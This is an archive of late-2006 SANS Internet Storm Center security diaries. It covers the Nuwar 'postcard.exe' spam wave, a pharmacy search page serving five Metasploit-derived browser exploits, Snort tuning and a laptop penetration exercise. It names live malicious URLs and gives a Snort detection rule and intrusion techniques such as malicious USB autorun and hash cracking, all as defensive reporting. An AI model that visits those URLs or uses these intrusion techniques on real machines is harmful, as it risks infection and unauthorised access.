Published: 2006-12-31

A Look Inside a Dirty Computer

Once again this week I had the opportunity to look at a computer that had been visited by the world of NEWdotNET.

The initial complaint from the computer's owner was that they couldn't connect to the Internet anymore.  The error they were getting was "An error occurred while renewing interface Local Area Connection: the requested service provider could not be loaded or initialized.", along with various protocol errors.  Another error indicated that there was a socket error.  Upon initial investigation I found that NEWdotNET was installed on the computer. 

This is not the first time that I have dealt with a computer that had been lured in by NEWdotNET, so I head to NEWdotNET's website to check the removal instructions.  Of course, I can not find removal instructions easily, so I search the web to see what removal instructions I could find.  There in the search I did find NEWdotNET's webpage with removal instructions.  Following the instructions on the NEWdotNET removal website proved to once again leave me less than satisfied with their removal procedures.  In researching the removal of the "garbage" installed by NEWdotNET, I discovered that they are now changing the winsock and tcp/ip stack with their own code.  Of course, now when you attempt to remove the programs and settings made by their installs you are left with a computer that can no longer connect and lots of socket errors.  In spite of the claims from their website that following the removal procedures will remove the software,  I found that it does not.

Off to Microsoft Knowledge Base to find out what can be done to return the computer to the settings that Microsoft intended XP to have.  I came across a knowledge base article that has the steps needed to determine and recover winsock corruption.  So step by step I made my way through the process to recover the winsock and repair the corruption.


Ok now the winsock is reset. What about TCP/IP?  I found another article on Microsoft's Knowledge base that dealt with the TCP/IP stack and the need to reset it after a winsock error.  So now, step by step I repair the TCP/IP stack as well.


All is well the computer is once again running. All of the NEWdotNET leftovers have been removed. 

So what is NEWdotNET?  As far as I can tell they are a DNS provider. From their website "NEW.NET seeks to become the world's leading domain name registry by introducing and selling domain names with new extensions that offer greater relevance and meaning than current Web site addresses ending in .com, .net, and other existing top-level domains. We are making this possible initially by encouraging millions of users to activate their Internet browsers to recognize NEW.NET domain names and partnering with leading Internet Service Providers to activate our domain names automatically at the network level."

Sounds innocent enough, however, in order for me to see those web pages that have the other extensions, I have to have their software installed.  Their software is a plug-in to the browser that you are using.  According to Counter Exploitations site:


"The NewDotNet software is what we like to call Foistware: it's something that you probably didn't ask for, and never felt a need for, but it came along anyway with an unrelated program you downloaded. NEWdotNET accomplishes this by compensating the authors of unrelated third-party software, which has ranged from media players to peer-to-peer file sharing programs, for "bundling" the browser plugin with their program. At one time, NEWdotNET advertised a 5 cent commission for each system the plugin was successfully installed on; however, we are unable to find current published figures for compensation."

It appears that NEWdotNET is not happy about the adverse publicity that their software has received over the years.  They claim that their software is not being installed without the permission of the owner of the computer.  I really take issue with this.  Of the computers that I have worked on that have had the software installed, I can not find one person who confirmed that they knew that NEWdotNET was being installed and agreed to the installation. 

From the website… they themselves claim to have 174,661,619 enabled users.  My question is how many of the nearly 175 million users even know that the software is installed?  How many agreed to the installation?  How many realize that the software leaves the computer open so that newdotnet can update the software whenever an update comes along (and by the way doesn't inform the user that an update is being done)?

(I would really like to know how many people actually remember being asked to install the newdotnet software.)

This computer may well have been the biggest challenge that I dealt with in 2006.  Some of you are probably saying, "Man why don't you just format and reinstall".  Sometimes I do, but if I didn't go through these types of exercises I would never know how this stuff works, I would not understand what to look for next time and would not be able to help people understand the importance of things anti-virus software, anti-spyware software and firewalls. 

I encourage each of our readers to take a look at what programs are running on your computers.  Make sure that the computers in your home, especially community computers are free from spyware, viruses and the like.  Make a resolution for 2007 to clean up your computers, check out the programs that are running on them and make sure that you understand what they are.  Make sure that your Anti-virus software, anti-spyware software is up-to-date and that you have a good firewall in place.

With that I wish each and every one of you a Happy New Year and a safe and prosperous 2007.


Published: 2006-12-31

Windows Defender expires today

For those of you using Windows Defender just wanted to remind you that the old version expires today.  Microsoft has a new version available for download at Windows Defender Update.

We have received a report from one of our readers that his Windows Defender install just stop working, no warning other than a service failed to start. Thanks for reporting this to us Karl. Is anyone else seeing this behaviour?

If you are running Windows Defender you may want to do the update today. 

Update:  It has been brought to our attention that Microsoft Windows Defender is no longer intallable or supported for Windows 2000.  Microsoft states that W2K is out of lifecycle and is no longer supported.  So those of you running Windows Defender on Windows 2000, you will need to look for another program. 


Published: 2006-12-31

Update on Postcard virus emails

One of our readers made an interesting observation, one which I have confirmed with the headers of the emails that I have received with the Nuwar virus.  All of the emails have a common user agent:  Thunderbird (Windows/20061207).  I am not sure of the significance of this, but it is an interesting observation.

Thanks Karl for the information.


Published: 2006-12-30

Postcard.exe - Let the mutations begin

At this time, we have received one report from reader Thomas who reports having seen variants of the email containing the postcard.exe attachment as previously reported. These variants may be changing the subject lines, but are definately changing the executable name. Reported name variants are "greeting card.exe", "greeting postcard.exe" and "GreetingCard.exe". I have been unable to independantly validate whether or not this variation is now widespread and the AV sites don't seem to be mentioning it yet. Write in and let us know if you're seeing these variants as well and send in samples if you can so we can determine if it's just a renamed version of the original or if there's other changes occuring in the code as well.

Update UTC1655: Several respondants have confirmed the behavior reported by Thomas. Known variations are as follows:

greeting card.exe
Greeting Card.exe
greeting postcard.exe
Greeting Postcard.exe

Subject lines appear to be changing with a much larger bank of possibilities. I anticipate AV vendors will begin to ducment this. A list was provided by reader Diego. This is a good start, but most likely partial:

Annual Fun Forecast!
Baby New Year!
Best Wishes For A Happy New Year!
Fun 2007!
Fun Filled New Year!
Happiness And Continued Success!
Happiness And Success!
Happiness In Everything!
Happy 2007!
Happy New Year!
Happy Times And Happy Memories!
May Your Dreams Come True!
New Hopes And New Beginnings!
New Year... Happy Year!
Promises Of Happy Times!
Raising A Toast To Happy Times!
Scale Greater Heights!
Sparkling Happiness And Good Times!
Warm New Year Hug!
Warmest Wishes For New Year!
Welcome 2007!
Wish You Smiles And Good Cheer!
Wishing You Happiness!
Wishing You Happy New Year!

Update UTC1845:

Reader Ken sent a note about two snort rules that are triggering against emails associated with this virus. The first rule can not be published here as it is a licensed rule under vrt license, which can be obtained from snort.org. Specifically it is used for detecting netsky attachments and has a sid of 9425.

The other rule, however, is public domain. Here it is:
VIRUS OUTBOUND bad file attachment

alert tcp $HOME_NET any -> $EXTERNAL_NET 25 (msg:"VIRUS OUTBOUND bad file attachment";flow:to_server,established;content:"Content-Disposition|3A|";


Published: 2006-12-29


We've received word from a number of readers that "postcard.exe" is currently being spammed in EMails with the subject "Happy New Year". AV coverage is still thin. MD5: 4adf7a3719c485a4e482498874b6695f

Update 1530UTC:  AV protection coming online, Trojan-Downloader.Win32.Tibs.jy (Kaspersky), W32/Dref-U (Sophos) W32.Nuwar.AY (TrendMicro). ClamAV was one of the first AVs to have protection available when the wave started last night, they are calling it Downloader-388.

There is also a set of BleedingSnort Sigs available which helps in detecting an existing infection (systems reporting to C&C).

Update 1400UTC: Symantec has thrown their hat in the ring with W32.Mixor.Q@mm.


Published: 2006-12-29

Pain reliever with serious side effects

Relax, you pundits of the pristine ISC blog, we are not going off-topic again. This story is about what can happen when you use a popular search engine in an attempt to look up side effects of a prescription drug. Thus happened, when Louis entered "Percocet" (a pain medication) and made the mistake to click onto the least sensible search result: http://www. pharmacy. topsearch20.net/search.php?q=percocet
I recommend you continue reading before you do like Louis and click on the above. Because the page returned, in addition to peddling cheap drugs, also includes two nifty IFRAMEs:

Again, these are - at the time of writing - live URLs, hosting bad stuff. Dont go there. Or, if you must, at least don't complain to us if you turn your PC into a brick while "investigating" the site.

statrafongon[dot]biz resolves to, which in itself already is an indication that something fishy could be waiting there - this IP range ( is one of the address segments used by the CoolWebSearch gang in Russia to propagate their toys. Let's look at what they serve this time:

new.php?adv=8 contains a copy of the MS06-014 (MDAC/RDS.Dataspace) exploit. The exploit used is lifted pretty much in verbatim from the Metasploit framework, in fact the successful exploit would even write the downloaded malware as "metasploit.exe" to the disk.

strong/08/index.html contains obfuscated Javascript:

While the Tom Liston Method(tm) to unravel such scripts is highly effective, I still prefer to do my unstuffing in Perl under Unix: $cat index.html | perl -pe 's/\%(..)/chr(hex($1))/ge' does the trick easily, and shows us that the page includes no less than five IFRAMEs, named exp1.htm to exp5.htm. Downloading and looking at each of these files individually, we found the following:

exp1.htm contains a different exploit for the same MS06-014 (RDS) vulnerability already seen above.
exp2.htm contains yet another stab at MS06-014.
exp3.htm goes after the WebViewFolderIcon (MS06-057) hole, again borrowing the code practically unchanged from Metasploit
exp4.htm contains an exploit of the VML vulnerability (MS06-055).
exp5.htm goes after the recent XML core services bug (MS06-071), and is using a copy of the PoC code posted at milw0rm.

The strategy to use five exploit variants seems to work - when I tested these files with some AV products, none was able to spot all five attempts. When successful, all five exploits would try to download and run a "win32.exe" off the same site. At the time of discovery (when Louis stumbled onto the site), win32.exe brought back a blank screen at Virustotal. By now, the situation has improved a bit.

The lesson learned? As far as we could determine, nothing happened to Louis' PC. Not because of his Antivirus, only because his PC was diligently patched. Otherwise, this pain reliever could have had serious side effects.

Update 29DEC 1025 UTC:  When I hacked in this diary late yesterday night, little did I know that the next day would bring a surprise. The surprise being that the "win32.exe" of this exploit is called Trojan-Downloader.Win32.Tibs.jy by Kaspersky. Same malware, apparently, that is currently being spammed as "postcard.exe", even though the file sizes and MD5 checksums differ.


Published: 2006-12-28

Cacti remote code and SQL injection vulnerability

Secunia has published a bulletin regarding vulnerabilities in the popular open-source network management web application, Cacti (versions <= 0.8.6i which is the current version).  The vulnerabilities include SQL injection and possible remote code execution.  There is public proof-of-concept code available.  If you run Cacti, you are urged to read the work-arounds in the bulletin until a patch/new version is released.

Secunia bullentin: http://secunia.com/advisories/23528/
CVE: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-6799
Cacti home: http://www.cacti.net

Jim Clausing,  jclausing %% at %% isc dot sans dot org


Published: 2006-12-28

What should I do with these gift cards?

My kids never know what to get me for birthdays or Christmas, so they get me gift cards to <insert electronics chain here> and <insert bookstore chain here>, which frankly is fine with me.  So the question for our faithful readers is what should I use these gift cards to buy this year?  I've read 4 of the 7 books on Richard Bejtlich's  Digital Security Postgraduate School, 4 of the 7 on his Digital Security War College, and 6 of the 7 on his Digital Security Bootcamp lists, but what other ones should I look at?  How about cool new gadgets?  I've got a friend who has a USB HDTV receiver/tuner to watch over-the-air HDTV, he thinks I should look at one of those, what do you think?  I'll collect responses and post your thoughts next week.

Jim Clausing, jclausing ++ at ++ isc dot sans dot org


Published: 2006-12-28

Port 32000 spike, got packets?

We've noticed in the dshield data and from some of our users, that there was a very large spike in activity on TCP port 32000 yesterday.  While it appears that the vast majority of this traffic seems to be coming from one source IP, it also seems to have hit a large chunk of internet address space.  At this point, the spike may very well be over, but if anyone has more than just SYN packets (like had a netcat listener on that port) and can share the packets with us so we can try to figure out what application they might have been looking for, please submit via the contact page.

Jim Clausing, jclausing -- at -- isc dot sans dot org


Published: 2006-12-28

Archiving the snort tips

Folks, we're in the process of moving Joel's snort article over to his personal handler page where it will be archived for the longer term.  In the meantime it is still available here, until it shows up here.


Published: 2006-12-27

The Snort Top 10

I work with SNORT®..... constantly. It's my job to do so. I've been using Snort for many years, I teach classes on how to configure it, I teach classes on how to write Snort rules. I've been using Snort and setting up Sourcefire and Snort devices on hundreds of different networks for years on end now.

I am frequently asked questions, many of the questions are the same things over and over again, and I always see the same mistakes being made when setting it up. So, i've compiled a list of the top ten mistakes and commonly misconfigured or overlooked things when configuring everyone's favorite IDS.

None of these override the necessity to read the Snort manual, however. The manual supersedes all Snort books, because as great as these books are, they can't keep up with the fast-paced updates at which Snort is updated. So here goes...

1. The Snort.conf file.
Almost all your options are set in this file. This file should be read line by line, from top to bottom, taking the time to fully understand what each one of the configuration options are. 90% of all the questions I get can be answered by just reviewing the documentation in the snort.conf file.

2. Variables.
At the very top of the Snort.conf file there are variables to be set. The very least of which is "HOME_NET". HOME_NET should ALWAYS be configured. Depending on the placement of your IDS, your HOME_NET is loosely interpreted as "whatever the Snort box is protecting". For instance, on my network, it's The whole network is controlled by my router, and no other IP addresses should be on the network unless it has this range. If I *had* other IP's pop on my network, I would definately not want them treated as mine! Common settings for HOME_NET may be your whole internal network range, such as any RFC 1918 addresses. Depending upon the placement of your sensor (such as at your border) you many want to have your public IP address space in your HOME_NET as well. Remember that only CIDR notation is accepted within the variable notation. won't work, neither will Only will. Another big thing to note is your setting for EXTERNAL_NET. By default, EXTERNAL_NET is set to "any". "Any" includes your HOME_NET. In order to make Snort treat traffic that is NOT in your HOME_NET as EXTERNAL, you can set your EXTERNAL_NET to "!$HOME_NET". Which setting applies to you is dependent upon the placement of your sensor.

3. Frag3 preprocessor.
Snort is able to avoid many different types of evasions. One of the big ones that people think they can slip by on any IDS is through IP fragmentation, or using malicious overlapping and underlapping fragments in order to slip the payload past your IDS's, but have it reassembled correctly on the target.

Okay.. I realized I may have just thrown a big ball at you... Let's back up.

IP fragmentation is when Packet A on Network A is too big to go onto Network B. So the router on the Network A side splits Packet A into Packet A.1, A.2, A.3, and so on, so it's able to fit onto Network B. However, these smaller packets aren't put back together until they reach the final destination IP. Still with me so far right? Cool...

The problem with that is, different operating systems put fragmented packets back together in different orders depending on the type of operating system. (and you thought they were all the same!) Well, the problem with IDS's is, they have absolutely not idea what the Operating Systems are that they are protecting. Frag3 allows you to tell it. Now, without writing a book about the subject, you need to go into the docs/ directory that is enclosed with your Snort tarball and read the README on frag3. (As well as the accompanying section in the Snort manual.)

However, in order to FULLY understand what I am talking about, go read the whitepaper written by Judy Novak. (You have to register to download it) She's one of the authors of the SANS 503 IDS course, one of the designers behind frag3, and currently a Vulnerability Research Team (VRT) employee at Sourcefire.

4. HTTP Inspection preprocessor.
The most misunderstood preprocessor there is. This preprocessor analyzes, normalizes, and alerts on http traffic. The thing to remember is, it's SERVER based. It's meant to analyze traffic coming inbound to your http SERVERS. It basically has two settings, the "global default" setting, which you should set to the majority of your web servers. For instance, are most of your web servers IIS, on port 80?  Then you need to set that to the global setting.  If only some of your web servers are not IIS, or  only some of them are not on port 80,  then those need to be specified INDIVIDUALLY, by IP! Does that mean you will have to create a separate line for each of your "non-standard" web servers? Yes! That's the way it's SUPPOSED to work!

5. Portscan preprocessor.
Also very mis-understood piece of code. You need to read the README for the "sfportscan" preprocessor in the docs/ directory. There is no better explanation on how to configure this preprocessor.

6. The rest of the preprocessors, to include the new "dynamic" preprocessors.
All of the preprocessors have configuration lines. Each need to be configured to the networks you are protecting with Snort. Review the documentation for each of them extensively. All the documentation is well written, and is written with the user in mind.

7. Rules.
The Rules in Snort are key. At the bottom of the Snort.conf you will see a bunch of "include" lines. "include $RULE_PATH/web-iis.rules" for example. This line will call the rules file web-iis.rules and load it in at runtime. Alot of people ask "what is the best ruleset to run?" Well, by far the first and foremost ruleset to run the VRT ruleset available after registration here. However, does this mean that you need to run every rule in that ruleset? NO! Take a look at the categories.. pop3.rules, imap.rules, oracle.rules, web-coldfusion.rules, pop2.rules, mysql.rules.. etc... Do you run these services on your network? Do you run pop3? Do you run pop2? Do you run imap? No? Then turn the rule category off! There is no sense in running rules that have no application to your network! All you are doing is potentially creating more work for yourself through false positives, as well as making the Snort engine work harder then it needs to.

"But I hear there are other rulesets besides the VRT set!" YES! There are. There are basically two. The BleedingThreats set available at www.bleedingthreats.com and the Community ruleset. Each of these rulesets is contributed to regularly by YOU the Snort community and each have their own pros and cons. Should you run all three rulesets? Sure! However, you need to go through each rule file, and turn on/off what you are not interested in or what does not apply to your network. For example, do you have Vertias on your network? No? Then go into exploit.rules and shut off the Veritas rules.

8. Output.
Snort can output to syslog, to pcap format (default), to a database, or lastly, to Unified. The "official" recommendation is to unified. The unified file format is the fastest output format coming out of the backend of Snort. Especially when you are trying to output to database! When Snort has to output to a database directly, it has to perform an INSERT into the db... doing so is CPU intensive. Do you want your IDS to be an IDS? Or a database insertion tool?  So use Unified! Well, the problem with unified is, you need something that reads unified file format and outputs it into the db, or tcpdump file format you want....

9. Barnyard (or FLoP)
Barnyard reads the unified file format and inserts what it finds into a db, or outputs into tcpdump file format. FLoP is another tool that also reads Snort's output (albeit in a different method) and does what you want with it. Both are excellent tools and both need to be checked out and use the one that's appropriate to you.

10. Rule updates.
However you choose to update your rules is up to you, I recommend Oinkmaster. Nice perl proggie to keep your rules up to date. Just don't forget to register on Snort.org and get your oinkmaster code if you wish to download the VRT registered user set.

Notice that I didn't put a recommendation for any type of Snort log reviewing tool. BASE, Sguil, Placid, etc.. all have their merits and you will want to check out the one that is most appropriate to your situation. However, I do have one recommendation that I will make here... and it's turning into more of a "RULE" now. Do NOT use ACID. Don't get me wrong, ACID was great for it's day, however, with over 200+ bug fixes, feature implementations, and the fact that ACID hasn't been updated in.. going on 4 years now... go with BASE if all you are looking for is an Alert browser. BASE works with your existing ACID db, and is very easy to upgrade to.

So there you go. I hope this helps a bit to get you started down the correct path of tuning Snort. Don't forget to hit the mailing list archives, post to the mailing lists with any questions, look for your local Snort User Group, visit the Snort Forums, or even write into us here at the ISC (several of us use Snort constantly, not just me).. or drop into irc.freenode.net into #snort and say hello! Thanks!

Stay tuned for another article on Snort in the future.. If you have suggestions about what I should write about as far as Snort goes, feel free to write in!

/** Joel Esler **/

Copyright 2006 Sourcefire, Inc. All Rights Reserved.  Sourcefire and Snort are registered trademarks of Sourcefire.


Published: 2006-12-27

Christmas Botnet Follow-up

In response to yesterday's diary entry on the drop in botnets right before Christmas, Claude wrote to us with an interesting theory.  Here is what he said:

From the dshield reports, I do also see a (small) drop in the number of scans during the last day, both at home and on the office firewall, about 10% less sources & hits.

My thoughts to explain this drop are the following : the new (unpatched) computers replaced the old (infected) ones, so the global number of bots has decreased. 99.9% of the new computers must be Windows XP SP2 with firewall turned on - and that's why the new computers are not yet infected. XP firewall does a fair job in protecting a computer from the most common attacks *from the outside* (137,139,135 & 445 are closed), allowing to visit windowsupdate and download the missing patches.
So my assymption is that 99% of the new computer will stay clean ... at least until their users begin to click each and every popup on the screen, install an IM program and receive xmas & ny wishes in their mailboxes.

My guess is we will see a slow rise in the botnet size over the next month, until most of the new computers are infected again with malware - not because they were unpatched from the start, but because the users received no education with their new toy. Why can't you buy that at Walmart too ?

Great analysis, Claude!  I think you've nailed it.  Many of the infected machines are turned off, the new shiny ones have not been infected, and the Internet is momentarily a safer place.  But like you said, give it a few weeks and we'll be right back to where we started from.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-27

Taiwan Earthquakes cut undersea cables

A number of readers submitted reports of Internet slowness to/from Asia. We now know that this is a direct result of up to six submarine cables being severed during a series of temblors off the coast of Taiwan. From Bloomberg:

"Taiwan was jolted by three earthquakes yesterday, killing two people
and injuring 42 others, the island's National Fire Agency said. The
tremors damaged undersea cables, causing a disruption to Internet
traffic and some telephone calls in the region for customers including
Singapore Telecom, PCCW, Chunghwa Telecom Co., Taiwan's biggest
telephone operator, and KDDI Corp., Japan's second-largest telephone

Our thoughts and prayers go out to all who have been lost or injured in the quakes and to their friends & families.


Published: 2006-12-27

US President Ford Dies

The news is breaking, and only a few sites are carrying the story.  Former US President Ford died a few minutes ago.  Details will be coming out soon on all of the major news outlets.  Our condolences to Mrs. Ford and the Ford family.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-26

DNS Misbehaving

[see the update below - the problem is with Rogers Cable]

A reader reported some difficulties resolving www.zonelabs.com from Canada.  We checked our circuits and two different sites (one in Belgium, one in the USA) showed this:

From Belgium:
$ dig www.zonelabs.com a

; <<>> DiG 9.2.2 <<>> www.zonelabs.com a
;; global options:  printcmd
;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49741
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;www.zonelabs.com.              IN      A

www.zonelabs.com.       86400   IN      A

zonelabs.com.           86400   IN      NS      dns1.zonelabs.com.
zonelabs.com.           86400   IN      NS      dns2.zonelabs.com.

From the USA:
~> dig www.zonelabs.com

; <<>> DiG 9.2.3 <<>> www.zonelabs.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61680
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 0

;www.zonelabs.com.              IN      A

www.zonelabs.com.       86245   IN      A

zonelabs.com.           86245   IN      NS      ns8.checkpoint.com.
zonelabs.com.           86245   IN      NS      dns1.zonelabs.com.
zonelabs.com.           86245   IN      NS      dns2.zonelabs.com.
zonelabs.com.           86245   IN      NS      ns6.checkpoint.com.

We asked our Canadian friend to run a dig query and here was his output:

 dig www.zonelabs.com a

; <<>> DiG 9.3.1 <<>> www.zonelabs.com a
;; global options:  printcmd
;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46367
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;www.zonelabs.com.              IN      A

www.zonelabs.com.       3600    IN      A

zonelabs.com.           86400   IN      NS

I removed the DNS server IP addresses for privacy purposes, but you can clearly see what the problem is.  His ISP's DNS server returns an address of as an answer.  This could be a local cache problem with his ISP or an indicator of a much larger attack. 

We need your help - run a dig query against your local DNS servers for www.zonelabs.com and let us know if you see as the reply.  No need to let us know if the queries come out OK, just if you see  Please use our contact page for submissions.


Marcus H. Sachs
Director, SANS Internet Storm Center

Numerous readers have written in to let us know that the problem appears to be solely with Rogers Cable DNS servers. There is no indication at this point that there is anything malicious afoot, although anytime a security software update site resolves incorrectly we need to dig into it.

There have been discussions in other forums about Rogers DNS problems, although we cannot determine if those are related to the zonelabs.com problem.

For the time being, Rogers customers may wish to change your DNS server settings to use one of the free public servers listed at http://www.opennic.unrated.net/public_servers.html or http://www.opendns.com/.

Thanks to everyone who responded!


Published: 2006-12-26

Ghost of Christmas Botnets?

One of our handlers said that he saw a significant spike in botnet activity to known CCs yesterday.  That would make sense, considering the millions of new computers that joined the Internet soup on Christmas day, right out of the box, and likely a few months behind on patches.  However, when we looked at our favorite botnet tracking site, ShadowServer, we see that there was just the opposite - a bit DROP in botnets on Christmas Eve and very little rise on Christmas Day.  Very odd.

So, what are your sensors seeing?  A rise in botnet activity or a drop?  Send us your observations via our contact page.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2006-12-26

Vista: better security [Y/N] ?

I went to a talk about Microsoft's Vista a little while ago and from what I remember of the presentation, some highlights of the security impact of Vista:
  • Vista has what's called "defense in depth" by Microsoft. Most of us think of something with multiple devices creating layers, but Microsoft uses the term for a way they use inside a machine to give processes and resources a level of trust. Low level processes cannot access higher classified assets.
    • IE has been given a low trust level. After asking questions it was still unclear if outlook would be low as well. It seemed the answer pointed to the attachments being low but outlook and the emails themselves not. But I might have misunderstood.
    • User processes are at a medium trust level.
    • Service processes are at a high level.
    • System is still the highest trust level.
  • Even when logged on with local admin rights, processes are not started by default with those rights. The demo was rather convincing with notepad refusing to save a file in c:\windows\ even though the user had admin rights. To start the application the local admin needs to right click and start notepad with additional rights.
  • There is a "secure desktop" used for switching users, logging in and being prompted for allowing additional rights needed by processes. The normal desktop is grayed out during such prompts making them rather hard to ignore. Note: the default is not accept but cancel. This secure desktop should somehow (unspecified how) make it more secure to do these prompts.
  • Signed application can voluntary say in their profile what they are expected to do and not to do. Vista will enforce that profile and terminate processes stepping outside of their profile. Eg.:
    An MTA could have a profile that it's only going to listen to port tcp/25.  Suppose the process gets exploited and starts to listen on another port to open up a backdoor: Vista could terminate the process right there.
    Since the thing is voluntary I'm wondering where the incentive will be for developers to use the belt and suspenders approach.
  • Virtualization: Once you tried once to get your users to give up local admin rights, you know it's a pain. For the least bit they need help and additional permissions. And just about any application you need won't play nice without a 10 round fight. Vista addresses this by virtualizing the filesystem for older "legacy" applications. If the application wants to drop an .ini file in c:\windows\, it's not given an error, but the file is dropped in an user owned directory instead. Reading obviously matches this to cheat the misbehaving application into working without having write access to critical directories.
  • The well publicized locking of kernel mode additions on 64bit kernels only (32bit would break drivers apparently, there are no to very few 64bit drivers that would break according to the presenter. Not in the presentation obviously, but there' the entire fight between Microsoft and the antivirus industry over this as well.
My impression is that they indeed did some significant work. Esp. the work to make it easier to run without local admin rights seems a major step forward.
They also left out some easy to achieve things that would make the world a lot safer. E.g. IE7 doesn't make it any harder to see a https site with a bad ssl certificate. Just pressing next still accepts the bad cert and shuts up about it. This makes man in the middle attacks way too easy.
I'm worried about the confidence they have this will be enough to change the tide. And most of all, I'm worried about the added complexity, as complexity creates more (security) bugs in my experience.

So: make up your own mind and let us know in the poll.

Swa Frantzen -- Section 66


Published: 2006-12-25

Changing Threat Models

    A number of days ago, a reader pondered about the possibility of an SNMP "Slammer Worm" based on the vulnerability described in MS06-074.  What would it take exactly for there to be another "Slammer"-like event?  A worm outbreak requires two major components: an internet worm, and a vulnerable population.  The model for the internet worm is made up of further sub-components: the scanner, the propagation code, and the exploit. Scanning routines influence the success and impact of a worm.  Poorly written scanning routines have limited many promising young worms in the past.  A lot of time has been spent studying the scanning methods of worms, I've wasted an hour or two on it myself, take a glance through www.wormblog.com to see the number of white-papers and academic works on the topic.  The propagation code must be written to accommodate any limitations placed upon it by the vulnerability exploited (such as size limitations, and NOP codes, or other constraints on the injected data.)  Some overcame these limitations by using a staged approach.  This workaround has its drawbacks, as the secondary stage can add its own limitations to the worm since the transfer may fail because of firewall rules or, the source of secondary payload my make a lucrative target for incident handlers.  Finally, the vulnerability must allow for unauthenticated remote execution of arbitrary code.  Since proven scanning routines are publicly available, and there are multiple examples of propagation code in circulation, the announcement of any network-visible vulnerability that allows unauthenticated remote execution of arbitrary code creates a potential situation.

     A quick review of MS06-074:

SNMP Memory Corruption Vulnerability (CVE-2006-5583)

CVSS (Base)  : 10.0 http://nvd.nist.gov/cvss.cfm?name=CVE-2006-5583&vector=(AV:R/AC:L/Au:NR/C:C/I:C/A:C/B:N)

Exploit code: Privately Available

     Now, some special things about SNMP are since it's UDP, the source IP address can be spoofed without affecting delivery of the exploit, also, knowledge of the SNMP community string may or may not be required to successfully deliver the exploit.

     This brings us to our second requirement for an "outbreak event," a vulnerable population.  Although a lot of systems are running SNMP, not that many are running with UDP/161 open to the internet.  On the other hand, there are a class of networks that may have UDP/161 allowed in from "trusted" 3rd party networks.  Which, based on the spoofability of UDP, isn't such a sound security practice.  These particulars alone would have limited impact on worm development, though the general inaccessibility to the SNMP port is a major limiting factor on the success of the potential worm.

    The limited size of a vulnerable population severely limits the possibility of a generalize Internet worm with "slammer"-like impact.

    If there was a large population ripe for an MS06-074 worm, I still reason that there would not be a "slammer"-like worm exploiting this vulnerability.  I left out one important criterion for a worm in the model above.  In addition to Scanning routines, propagation methods, a vulnerability exploit, and a vulnerable population, a worm also needs a motivated creator in order to come into existence.  (I'm chagrined to admit that malware follows a model of intelligence design, and not Darwinian evolution.)

    The model of the malcode author has changed these past years.  Monetary gain has now outpaced the egotistical quest for fame/notoriety, etc. as the driving motivation behind malcode creation.  A malcode author wants to be able to leverage their creation, so now you see botnets, not internet worms.

    So, we will not likely see an SNMP "slammer" worm.  The question should be: "will we see an SNMP 'SDbot'?"  Because of how SNMP is often implemented, I don't see a large chance of that either.

    With exploit toolkits like metasploit and webattacker, every new vulnerability that is discovered runs the possibility of becoming an "event."  Neither of these toolkits will create an internet worm like slammer.  Instead they make smaller, harder-to-detect events that can be leveraged by the criminal to cause more damage in the long run.

kliston -at- isc.sans.org


Published: 2006-12-25

A Security Sampler

Recently, a box full of laptops found their way into my possession.  They had come from a number of small businesses via various sales and trades and were destined to a new startup.  My job was to sanitize them, and reinstall the OS for the client.  In the meantime, they presented an opportunity to see how the small-business system administrator secures his or her systems.

The systems ranged from Windows 98 through Windows XP systems.  They underwent a simple physical inspection/inventory and then subjected to "evil" acts.  They were used in a demonstration of Metasploit as live-fire targets.  Malicious USB drives were inserted into them.  Finally they were subjected to forensic examination.

Metasploit Results

Without fail, blind plinking from metasploit, (or a simple nessus scan followed by less-blind plinking with metasploit) resulted in a compromised system.  To be fair, the machines hadn't seen Windows Update in a month or two, they had been sitting idly on shelves or packed in boxes.  The Windows 98 systems enjoyed a bit of security through obsolescence and were tougher targets for metasploit.

Anti-Virus and Anti-Spyware Protection

Every system had some sort of Anti-virus protection.  This is a good thing.
All systems, except for the win98 systems, had Anti-Spyware as well, Spybot S&D was very popular, followed by adaware.

Malicious USB

With all of the AV and Anti-spyware running on the systems, none detected the malicious USB drives.  Most systems happily complied with the autorun requests.  There were many SAM files captured this way.


The systems that resisted the malicious USB drives did not stand up to booting up with knoppix and pulling the files that way.  None of the systems used any drive encryption or BIOS protection.

VNC and other BackDoors

Many of the systems booted up with VNC running in listen mode.  Probably handy for the sysadmin to maintain their flock, but a strong password, or maybe system-specific passwords may have been a better choice.

One admin created a backdoor account with Administrator privileges (but they do get points for not granting Administrator privileges to all of their users) unfortunately with such a weak password, the strong password protecting the real Administrator account didn't keep my class out of your machine.


Cain and Abel and John the Ripper made quick work of the password hashes.  There was not a single instance of a special character in any of the passwords.  Great classics like: password and 1234567 were disappointingly common.  Administrator passwords were also weakly protected, with only simple tricks attempted like reversing the company's name.

Forensic Fun

Imaging drives, recovering files, documentation-- good times, but important if you're going to build a case, and important to practice.  It doesn't come without its rewards.  In the course of the simulated investigation we uncovered two failing marriages, one interoffice romance (nestled ironically amongst power-point presentations on Sexual Harassment in the Workplace,) and all the pr0n one could hope for from Google Images.  Sigh.

Surprising Find

The surprising find was a lack of rootkits.  I was surprised to find very little spyware as well.

Final Word

There is a surprising amount of company information that leaves the door on the average laptop.  Although the word has gotten out about AV and Anti-spyware protection, USB lockdown and drive encryption should also be universally applied to mobile assets.  You never know where your old equipment may end up, and who might be writing about what they find…

kliston -at- isc.sans.org


Published: 2006-12-25

Merry Christmas to All!

